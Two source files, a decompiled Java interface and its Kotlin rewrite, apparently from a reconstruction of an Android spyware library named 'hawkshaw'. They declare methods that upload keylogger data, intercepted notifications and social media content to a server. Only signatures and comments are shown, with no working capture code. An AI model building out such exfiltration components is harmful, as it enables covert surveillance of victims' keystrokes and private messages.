File: Dummy/hawkshaw/library/datalayer/network/service/AccessibilityService.java
package com.hawkshaw.library.datalayer.network.service;

import a3.e;
import com.hawkshaw.library.datalayer.models.accessibility.PushKeyLogsRequest;
import com.hawkshaw.library.datalayer.models.accessibility.PushNotificationRequest;
import com.hawkshaw.library.datalayer.models.accessibility.PushSocialMediaRequest;
import com.hawkshaw.library.datalayer.models.accessibility.PushUnprocessedSocialMediaRequest;

public interface AccessibilityService {
    Object pushKeyLogs(PushKeyLogsRequest pushKeyLogsRequest, e eVar);

    Object pushNotifications(PushNotificationRequest pushNotificationRequest, e eVar);

    Object pushSocialMedia(PushSocialMediaRequest pushSocialMediaRequest, e eVar);

    Object pushUnprocessedSocialMedia(PushUnprocessedSocialMediaRequest pushUnprocessedSocialMediaRequest, e eVar);
}

File: app/src/main/java/com/hawkshaw/library/datalayer/network/service/AccessibilityService.kt
package com.hawkshaw.library.datalayer.network.service

import com.hawkshaw.library.datalayer.models.accessibility.PushKeyLogsRequest
import com.hawkshaw.library.datalayer.models.accessibility.PushKeyLogsResponse
import com.hawkshaw.library.datalayer.models.accessibility.PushNotificationRequest
import com.hawkshaw.library.datalayer.models.accessibility.PushNotificationResponse
import com.hawkshaw.library.datalayer.models.accessibility.PushSocialMediaRequest
import com.hawkshaw.library.datalayer.models.accessibility.PushSocialMediaResponse
import com.hawkshaw.library.datalayer.models.accessibility.PushUnprocessedSocialMediaRequest
import com.hawkshaw.library.datalayer.models.accessibility.PushUnprocessedSocialMediaResponse
import com.hawkshaw.library.datalayer.network.twirp.ApiResponse

/**
 * Service for sending accessibility data to the server
 */
interface AccessibilityService {
    /**
     * Push keylogger data to the server
     */
    suspend fun pushKeyLogs(request: PushKeyLogsRequest): ApiResponse<PushKeyLogsResponse>
    
    /**
     * Push notification data to the server
     */
    suspend fun pushNotifications(request: PushNotificationRequest): ApiResponse<PushNotificationResponse>
    
    /**
     * Push social media data to the server
     */
    suspend fun pushSocialMedia(request: PushSocialMediaRequest): ApiResponse<PushSocialMediaResponse>
    
    /**
     * Push unprocessed social media data to the server
     */
    suspend fun pushUnprocessedSocialMedia(request: PushUnprocessedSocialMediaRequest): ApiResponse<PushUnprocessedSocialMediaResponse>
} 